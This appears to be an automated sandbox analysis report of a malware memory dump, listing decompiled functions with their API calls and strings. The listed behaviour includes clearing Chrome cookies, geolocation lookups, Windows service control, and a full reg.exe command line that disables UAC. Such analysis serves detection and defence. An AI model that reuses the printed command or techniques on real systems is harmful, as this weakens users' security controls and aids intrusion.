                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4e3d8c9a568c57fb9dcdc880f5c8ebbc933660610661b36433ba77454d73a655
                                                                                  • Instruction ID: 106e2cecea33a690a52cc41c1271e31c3df1f85e8271d36c5dacef07d135bc52
                                                                                  • Opcode Fuzzy Hash: 4e3d8c9a568c57fb9dcdc880f5c8ebbc933660610661b36433ba77454d73a655
                                                                                  • Instruction Fuzzy Hash: 2C113232504214BBCB213F769C0596B7B7CDF857A7F11062BFC1583292DA38C9089269
                                                                                  Function 0041936B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00419392
                                                                                  • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 004193A8
                                                                                  • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 004193C1
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00419407
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0041940A
                                                                                  Strings
                                                                                  • http://geoplugin.net/json.gp, xrefs: 004193A2
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$CloseHandleOpen$FileRead
                                                                                  • String ID: http://geoplugin.net/json.gp
                                                                                  • API String ID: 3121278467-91888290
                                                                                  • Opcode ID: 7fcb56876af0f522e84ab7e8d8f64b5881d67df2ffb9a695aea30fd6e424dab6
                                                                                  • Instruction ID: 9fad89c028030122b1819b6a874fefb9d729214f45c39af6bed7b2b06c6e4f32
                                                                                  • Opcode Fuzzy Hash: 7fcb56876af0f522e84ab7e8d8f64b5881d67df2ffb9a695aea30fd6e424dab6
                                                                                  • Instruction Fuzzy Hash: 3311C8311053126BD224EF169C59DABBF9CEF85765F40053EF905A32C1DBA8DC44C6A9
                                                                                  Function 0044E0DA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0044DE21: _free.LIBCMT ref: 0044DE4A
                                                                                  • _free.LIBCMT ref: 0044E128
                                                                                    • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                                                    • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                                                                  • _free.LIBCMT ref: 0044E133
                                                                                  • _free.LIBCMT ref: 0044E13E
                                                                                  • _free.LIBCMT ref: 0044E192
                                                                                  • _free.LIBCMT ref: 0044E19D
                                                                                  • _free.LIBCMT ref: 0044E1A8
                                                                                  • _free.LIBCMT ref: 0044E1B3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                                                                  • Instruction ID: b65b67035ea7ffc6fe2c1778d32cb4f6cbb79ca162155871331ff7aa41bb66fd
                                                                                  • Opcode Fuzzy Hash: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                                                                  • Instruction Fuzzy Hash: 64111571940B08AAE520BFF2CC47FCBB7DC9F14708F50882EB29D6A552DA7DB6044654
                                                                                  Function 004380FA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,?,004380F1,0043705E), ref: 00438108
                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00438116
                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043812F
                                                                                  • SetLastError.KERNEL32(00000000,?,004380F1,0043705E), ref: 00438181
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                  • String ID:
                                                                                  • API String ID: 3852720340-0
                                                                                  • Opcode ID: a51cd608757b9cf21dde5cb3b99bb74488ace4818edb59339c74db540250a301
                                                                                  • Instruction ID: 5a832d73688d02476ca7511e273f3515cfb573674d76dbd3fe9934521fa1a72b
                                                                                  • Opcode Fuzzy Hash: a51cd608757b9cf21dde5cb3b99bb74488ace4818edb59339c74db540250a301
                                                                                  • Instruction Fuzzy Hash: F101283210C3326EAA102F767C85A1BAA94EB09779F31633FF214951E1FFA99C02550C
                                                                                  Function 0040A9E2 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040AA1E
                                                                                  • GetLastError.KERNEL32 ref: 0040AA28
                                                                                  Strings
                                                                                  • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040A9E9
                                                                                  • [Chrome Cookies not found], xrefs: 0040AA42
                                                                                  • [Chrome Cookies found, cleared!], xrefs: 0040AA4E
                                                                                  • UserProfile, xrefs: 0040A9EE
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DeleteErrorFileLast
                                                                                  • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                  • API String ID: 2018770650-304995407
                                                                                  • Opcode ID: 72959d3c99de93e4222bab9abc487c3734757a9235bfdd9193e44ef0947d1452
                                                                                  • Instruction ID: 1f34f6daae66b163f55af04f15e1d0b60933b3567ae099988c08ef58cbd90c9e
                                                                                  • Opcode Fuzzy Hash: 72959d3c99de93e4222bab9abc487c3734757a9235bfdd9193e44ef0947d1452
                                                                                  • Instruction Fuzzy Hash: 0E01F731B4020467C6047A75DD278AE77249951304B50057FF402773D2FD798915CA9F
                                                                                  Function 0043887C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __allrem.LIBCMT ref: 00438A09
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A25
                                                                                  • __allrem.LIBCMT ref: 00438A3C
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A5A
                                                                                  • __allrem.LIBCMT ref: 00438A71
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A8F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                  • String ID:
                                                                                  • API String ID: 1992179935-0
                                                                                  • Opcode ID: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                                                                                  • Instruction ID: 1db505a437643d25cad1e1ab06004ebe691486694b679651004c0d70fbe8f9c1
                                                                                  • Opcode Fuzzy Hash: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                                                                                  • Instruction Fuzzy Hash: CD815972A007069BE724BA29CC41B6BF3E8AF49328F14512FF511D6382EF78D900875D
                                                                                  Function 00442E0B Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __cftoe
                                                                                  • String ID:
                                                                                  • API String ID: 4189289331-0
                                                                                  • Opcode ID: eba01cb7e667bf10c13e1131eb8d53c0a733c53fb11b583ea7a9a5fabebc0a3a
                                                                                  • Instruction ID: 4563a9c63fae0d6d7f7aa9a83d474a3ec136fb2d14012502de5dff0b8c27d610
                                                                                  • Opcode Fuzzy Hash: eba01cb7e667bf10c13e1131eb8d53c0a733c53fb11b583ea7a9a5fabebc0a3a
                                                                                  • Instruction Fuzzy Hash: CB510C32500205ABFB209F598E45EAF77B8EF48334FE0421FF415D6282EB79D941966C
                                                                                  Function 00444A81 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __freea$__alloca_probe_16_free
                                                                                  • String ID: a/p$am/pm
                                                                                  • API String ID: 2936374016-3206640213
                                                                                  • Opcode ID: 57e5036cd7783279a466902622085f7a15e34eba906f96654b679836998df48b
                                                                                  • Instruction ID: 5910b70c00eb86a61931efff1dda8232d7c1eee9eff2524394b85f82b3a3e216
                                                                                  • Opcode Fuzzy Hash: 57e5036cd7783279a466902622085f7a15e34eba906f96654b679836998df48b
                                                                                  • Instruction Fuzzy Hash: 05D1E171900206CAFB289F68C895BBBB7B1FF85300F29415BE905AB391D73D9D81CB59
                                                                                  Function 0040F8B7 Relevance: 9.1, APIs: 6, Instructions: 75COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040F8C4
                                                                                  • int.LIBCPMT ref: 0040F8D7
                                                                                    • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
                                                                                    • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
                                                                                  • std::_Facet_Register.LIBCPMT ref: 0040F917
                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040F920
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040F93E
                                                                                  • __Init_thread_footer.LIBCMT ref: 0040F97F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                  • String ID:
                                                                                  • API String ID: 3815856325-0
                                                                                  • Opcode ID: 884822b495c0d911e7e6d260955d18b9f199f61a7b6913d9d71a9645d575b0f3
                                                                                  • Instruction ID: 3bb9722abb9e04fd13c8d4025e7ce1c878c76566b3017ce531706a3e1b7c3414
                                                                                  • Opcode Fuzzy Hash: 884822b495c0d911e7e6d260955d18b9f199f61a7b6913d9d71a9645d575b0f3
                                                                                  • Instruction Fuzzy Hash: 90212232900104EBCB24EBA9E94699E7378AB08324F20017FF844B72D1DB389F458BD9
                                                                                  Function 00418C2E Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C3E
                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00418344,00000000), ref: 00418C52
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418C5F
                                                                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C94
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA6
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA9
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                  • String ID:
                                                                                  • API String ID: 493672254-0
                                                                                  • Opcode ID: e5fb97a0e042aa3cf5d98ae642475e55fc2ba561f34e835e136d8c0823c8ccc0
                                                                                  • Instruction ID: 151ede47f5a01f66990efdacd58a0b59027112db6305451f0336687f4909308b
                                                                                  • Opcode Fuzzy Hash: e5fb97a0e042aa3cf5d98ae642475e55fc2ba561f34e835e136d8c0823c8ccc0
                                                                                  • Instruction Fuzzy Hash: A20149711862183AE6108B389C4EEBB3A6CDB42771F14032FF925A32D1EE68CD4185F9
                                                                                  Function 00445725 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                                                                  • _free.LIBCMT ref: 0044575C
                                                                                  • _free.LIBCMT ref: 00445784
                                                                                  • SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 00445791
                                                                                  • SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                                                                  • _abort.LIBCMT ref: 004457A3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                  • String ID:
                                                                                  • API String ID: 3160817290-0
                                                                                  • Opcode ID: beb673fc776bdcf0cb4aa2f907b8faed87466b0c6696de81e80bb7a9f8cba6db
                                                                                  • Instruction ID: 2afc6a99b93033dbed13f8def56e2284daf42193b39b630cfab03248b002a5f8
                                                                                  • Opcode Fuzzy Hash: beb673fc776bdcf0cb4aa2f907b8faed87466b0c6696de81e80bb7a9f8cba6db
                                                                                  • Instruction Fuzzy Hash: 6EF0FE35100F0067FA117B367C8AB2F1A695FC2B2AF21013BF419D6293EE3DC902452D
                                                                                  Function 00418A5C Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,004185D9,00000000), ref: 00418A6B
                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004185D9,00000000), ref: 00418A7F
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418A8C
                                                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004185D9,00000000), ref: 00418A9B
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AAD
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AB0
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                  • String ID:
                                                                                  • API String ID: 221034970-0
                                                                                  • Opcode ID: 3bbd86ba799800cf7f8ce060c277169374427670bb2790cc1e4148a280c4ce89
                                                                                  • Instruction ID: 4afe7732e2fa81f36ccf108e41ed7890102f29a09d0e479adccf976045b68e04
                                                                                  • Opcode Fuzzy Hash: 3bbd86ba799800cf7f8ce060c277169374427670bb2790cc1e4148a280c4ce89
                                                                                  • Instruction Fuzzy Hash: A4F0C2315013186BD210EBA5DC89EBF3BACDF45B96B41002BFD0993192DF38CD4689E9
                                                                                  Function 00418B60 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00418559,00000000), ref: 00418B6F
                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00418559,00000000), ref: 00418B83
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418B90
                                                                                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00418559,00000000), ref: 00418B9F
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB1
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB4
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                  • String ID:
                                                                                  • API String ID: 221034970-0
                                                                                  • Opcode ID: 51d638f86096adaa624434d30e6a89006adfc0cfe1ec13e8d912c26abb46eda1
                                                                                  • Instruction ID: 20460b91a854b5e3c53015269073f2e928c2deccd9acf6b4d89527a320d4dccf
                                                                                  • Opcode Fuzzy Hash: 51d638f86096adaa624434d30e6a89006adfc0cfe1ec13e8d912c26abb46eda1
                                                                                  • Instruction Fuzzy Hash: 22F0C2715402186BD210EB65DC89EBF3BACDB45B52B81006AFE09A3192DE38DD4589E9
                                                                                  Function 00418BC7 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,004184D9,00000000), ref: 00418BD6
                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004184D9,00000000), ref: 00418BEA
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418BF7
                                                                                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004184D9,00000000), ref: 00418C06
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C18
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C1B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                  • String ID:
                                                                                  • API String ID: 221034970-0
                                                                                  • Opcode ID: 0684a22c1c03eddcd9e7afcbe452ed3b601dba84a8ad96751855c8c9c88a9e76
                                                                                  • Instruction ID: 1da220ff3ffe1d32b0df5c47a21bcd1adf2661b27de4fa42f8fed5365a22baa8
                                                                                  • Opcode Fuzzy Hash: 0684a22c1c03eddcd9e7afcbe452ed3b601dba84a8ad96751855c8c9c88a9e76
                                                                                  • Instruction Fuzzy Hash: 32F0C2715012186BD210EB65EC89DBF3BACDB45B51B41002AFE0993192DF38CD4589F9
                                                                                  Function 0041B2C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegisterClassExA.USER32(00000030), ref: 0041B310
                                                                                  • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                                                                                  • GetLastError.KERNEL32 ref: 0041B335
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ClassCreateErrorLastRegisterWindow
                                                                                  • String ID: 0$MsgWindowClass
                                                                                  • API String ID: 2877667751-2410386613
                                                                                  • Opcode ID: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
                                                                                  • Instruction ID: 33db8f89e50e9671cec9701a72200cc03bcb20702a276687bfdd99081a41ce18
                                                                                  • Opcode Fuzzy Hash: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
                                                                                  • Instruction Fuzzy Hash: 1F0125B190031CABDB10DFE5EC849EFBBBCFB08355F40052AF810A2250E77599048AA4
                                                                                  Function 00437603 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 0043761A
                                                                                    • Part of subcall function 00437C52: ___AdjustPointer.LIBCMT ref: 00437C9C
                                                                                  • _UnwindNestedFrames.LIBCMT ref: 00437631
                                                                                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 00437643
                                                                                  • CallCatchBlock.LIBVCRUNTIME ref: 00437667
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                  • String ID: /zC
                                                                                  • API String ID: 2633735394-4132788633
                                                                                  • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                  • Instruction ID: d669bc69f5b2d8c9fbf55978af89ff33433ac2085b506f133949dc977f569c90
                                                                                  • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                  • Instruction Fuzzy Hash: 44012D72004508BBCF225F56CC42EDA3BBAEF4C764F15501AFA9861220C33AE861DF98
                                                                                  Function 0041739D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetSystemMetrics.USER32(0000004C), ref: 004173AA
                                                                                  • GetSystemMetrics.USER32(0000004D), ref: 004173B0
                                                                                  • GetSystemMetrics.USER32(0000004E), ref: 004173B6
                                                                                  • GetSystemMetrics.USER32(0000004F), ref: 004173BC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MetricsSystem
                                                                                  • String ID: ]tA
                                                                                  • API String ID: 4116985748-3517819141
                                                                                  • Opcode ID: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
                                                                                  • Instruction ID: 3cbdadbf3de93f5eefc1923f71e525f4be7d9c38d0567e5d5edaddbebabc810f
                                                                                  • Opcode Fuzzy Hash: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
                                                                                  • Instruction Fuzzy Hash: 64F0AFB1B043254BD700EA7A8C41A6FAAE59BD4274F11443FFA09C7282EEB8DC458B94
                                                                                  Function 0040E501 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,00000000,00471FFC), ref: 0040E547
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E556
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E55B
                                                                                  Strings
                                                                                  • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040E53D
                                                                                  • C:\Windows\System32\cmd.exe, xrefs: 0040E542
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseHandle$CreateProcess
                                                                                  • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                  • API String ID: 2922976086-4183131282
                                                                                  • Opcode ID: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
                                                                                  • Instruction ID: 9c8cd13d2f2f5b55d8ef3643fb71004f418ed3317f879fdff7c1c4061e2abca7
                                                                                  • Opcode Fuzzy Hash: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
                                                                                  • Instruction Fuzzy Hash: 1AF06276D0029C7ACB20AAD7AC0DEDF7F3CEBC6B11F00005AB504A2050D5746540CAB5
                                                                                  Function 0044083A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004407EB,?,?,0044078B,?), ref: 0044085A
                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044086D
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,004407EB,?,?,0044078B,?), ref: 00440890
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
